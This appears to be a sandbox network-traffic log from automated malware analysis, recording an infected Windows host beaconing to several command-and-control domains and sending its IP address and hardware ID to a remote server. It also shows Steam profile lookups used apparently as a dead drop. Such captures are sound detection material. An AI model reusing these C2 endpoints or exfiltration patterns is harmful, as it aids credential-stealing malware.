2024-10-02 07:42:38 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7a1k63cf21vktgl8b333u2v6b9; expires=Sun, 26 Jan 2025 01:29:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jaNahqv4Gpz0moIbxfOr9jk5srdhu%2Fodmo8lVb9kFezz13UcbAi1WfVgyJLq6dDpSmOGDkPCnpMLpWOmDVfHFdRV9Mvt9RAbwJBNZsMwM4pSacoH3DMAfBfcP8aU%2F57RZ%2B%2FDyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e8f19728c3b-EWR alt-svc: h3=":443"; ma=86400
2024-10-02 07:42:38 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49828	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:38 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:38 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 32 62 36 30 62 63 32 64 62 36 61 35 37 63 62 38 66 37 65 31 32 36 35 36 39 37 61 31 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="token"f12b60bc2db6a57cb8f7e1265697a147------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFHIIEHJKKECGCBFIIJDCont
2024-10-02 07:42:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:38 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49829	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:38 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soldiefieop.site
2024-10-02 07:42:38 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:39 UTC	766	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5v6t1655tg6p9gei38pfjg833n; expires=Sun, 26 Jan 2025 01:29:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jg%2BJsJHhjAgnPszPRVdJgCEMt2ZVjPU2H04ZLqbcjLEL84Rr8gZnM%2B6Nzdw4TmiaG3V6dih4RxU99Yw%2FEYcSiQIaLel6Ff9tUo0dTPeg1btlUYa4PgqZr39IOdnja5gsS8LL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e951aef4255-EWR
2024-10-02 07:42:39 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49831	104.21.56.150	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:39 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abnomalrkmu.site
2024-10-02 07:42:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:40 UTC	764	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o8lud02t8gjj407eakvfc37ghc; expires=Sun, 26 Jan 2025 01:29:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Du75bOKy3apdeOdDhM2AXtATDXNbBrnbr55Hnqou2rIzPcAyadrN%2B60mDQZLpiDY1Sfek%2FHMjnEhnCSksg3ue7vSVkrCHxam2zd8lYRbsVFkq6yaBk7rM7C33x9D8TMNKaH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e9bdd2c42f2-EWR
2024-10-02 07:42:40 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49832	104.21.84.18	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:41 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: treatynreit.site
2024-10-02 07:42:41 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:42 UTC	799	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k43gh3b9md6pednm5iblejbpvh; expires=Sun, 26 Jan 2025 01:29:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dc5QR%2FrROa4IVqcYzuIhAXNwEBmrsAQskqICmbvCMn3qbDP0eubh%2BLkGuARmPa%2FxKg%2F%2BpCFE1GFyjQBmrj0o1Rb17pOCiu0nbJCwDaPAmal%2B3vxfPUwITTX03fsfmMq%2Fs%2BoG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ea40f0942d1-EWR
2024-10-02 07:42:42 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49834	104.21.18.193	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:43 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: snarlypagowo.site
2024-10-02 07:42:43 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:43 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=67p7hi5mhdclk2d5e1brk68kop; expires=Sun, 26 Jan 2025 01:29:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRYgczPMn%2BAiQiQK%2B9aUlIpQOtWGOwt8rtHoSqvBVmTYfetLW%2BAlsj79s9HdhyB8x4t0Ui%2F8HIr%2BWnJc8bZcT1BePQVRj2WqY2Zr9lrZNrrNLxDvMPn4o3meUyw4JFawEH1CWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30eb1788c7d20-EWR
2024-10-02 07:42:43 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49833	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:43 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:42:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:43 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:42:43 UTC	617	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKuxSS95RbBUpNFF%2BMG8EN4sX6%2BdZKO9Bdq96Bc4aUih64Sph%2BILwREBBfDE%2F4BUauQhzlfPWTtvpPuNj4Gc2K6BvtOt33%2F6SweoAy9kBcx9%2F%2BsrRmJqqWq%2FbQL2wAgrRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30eb19cf341ba-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49836	172.67.195.67	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:44 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mysterisop.site
2024-10-02 07:42:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:44 UTC	766	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tbfuh2osb65ps3ge9cp01eje7k; expires=Sun, 26 Jan 2025 01:29:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AL393ZBDYsHSQVWdH4FlKGtEaJ8VhMJfOnmXfZNMCMT7KnLmQrR7G0neobCI22ZAFuGgDdaMlnxzoO%2FMVGveZVEEcDwxQ086buqsMNQNVgsoMa58h%2BMoFvLnr4vTManLPdY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30eb83d7c7c9f-EWR
2024-10-02 07:42:44 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49837	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:44 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:42:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:45 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:42:45 UTC	605	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIrzhp2IOWebQoo0NXsM8qZndZipu9p9afIVm35hUPOwcgq0fSQPX80VRDFY%2BdXCel2dSx83BVPTjUWx2ndS6IwIuxajF5dqCBWW76h123EcqUxGNDiMTVL25Q7oH2n1uA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ebb9ea64204-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49838	104.21.17.174	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:45 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: absorptioniw.site
2024-10-02 07:42:45 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:46 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pckpplfp5gplfo5k5ccogm75oi; expires=Sun, 26 Jan 2025 01:29:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVZPMv%2BpHuR6UFzwsO5%2FaEANzC1bhx%2BuQdFUrRI%2FW8GaRl3rYSMWN9Z8DVOraLofYEdl8yohVUXs3qXhhH3XOh9mPU%2Bd2nqbtxXi2URxjdZ6u8GmeOb8yiVWlhHxtDs4LZX7lw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ebf6afc6a59-EWR
2024-10-02 07:42:46 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49839	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:46 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:42:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:46 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:42:46 UTC	607	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=liQ6TtyrMcdegQu2m5WnuQjHxofDQ9QlgxND8X%2FmWZiDd6ZMqNF9KdwDJXyewMTzrx%2Bz7PxNd9L2I7Aqrt8Kj9JuY5v3vFHGX%2BjAuLbBJrPvIbfk8PoLGTVCAgE1QfkFpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ec4fabe0f3d-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49840	104.102.49.254	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:47 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-02 07:42:47 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:42:47 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=d9954fbe89d6e207aff1f41c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:42:47 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:42:47 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-02 07:42:47 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-02 07:42:47 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49841	104.21.16.12	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:48 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gravvitywio.store
2024-10-02 07:42:48 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:48 UTC	776	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pa0qgem5v2ls9c7562hujorl1b; expires=Sun, 26 Jan 2025 01:29:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5ejnqSNqarcr3qs7Su4OkXZkbtxkoyQ9j4Td6koJpyqkNCkTzomIM3sMox2g6dYChn%2BZwiZ21do1stX4xtWtR857tXbHn%2F39Rp272ffGurJW6QsEU%2FStXYhxDnBNyF2%2BftosQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ed1cffe4314-EWR
2024-10-02 07:42:48 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49842	104.102.49.254	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:50 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
